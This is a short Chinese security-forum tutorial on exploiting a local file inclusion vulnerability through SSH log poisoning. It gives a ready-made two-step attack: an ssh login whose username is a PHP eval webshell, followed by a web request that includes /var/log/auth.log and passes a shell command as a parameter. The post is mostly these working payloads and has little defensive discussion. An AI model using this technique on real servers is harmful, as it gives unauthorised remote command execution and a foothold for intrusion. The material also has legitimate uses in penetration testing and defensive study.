文件包含漏洞利用-SSH日志包含 - 火线 Zone-安全攻防社区

文件包含漏洞利用-SSH日志包含

45813

/var/log/auth.log是管理鉴权的日志，可以看到网络上相应的登陆attempt。

微信图片_20210909202251

当我们发现一个本地文件包含漏洞时，可以把ssh连接的用户名写成webshell，然后包含/var/log/auth.log获取服务器权限：

ssh '<?php eval($_GET['k']); ?>'@192.168.1.1

访问http://192.168.1.1/baohan.php?file=/var/log/auth.log&k=whoami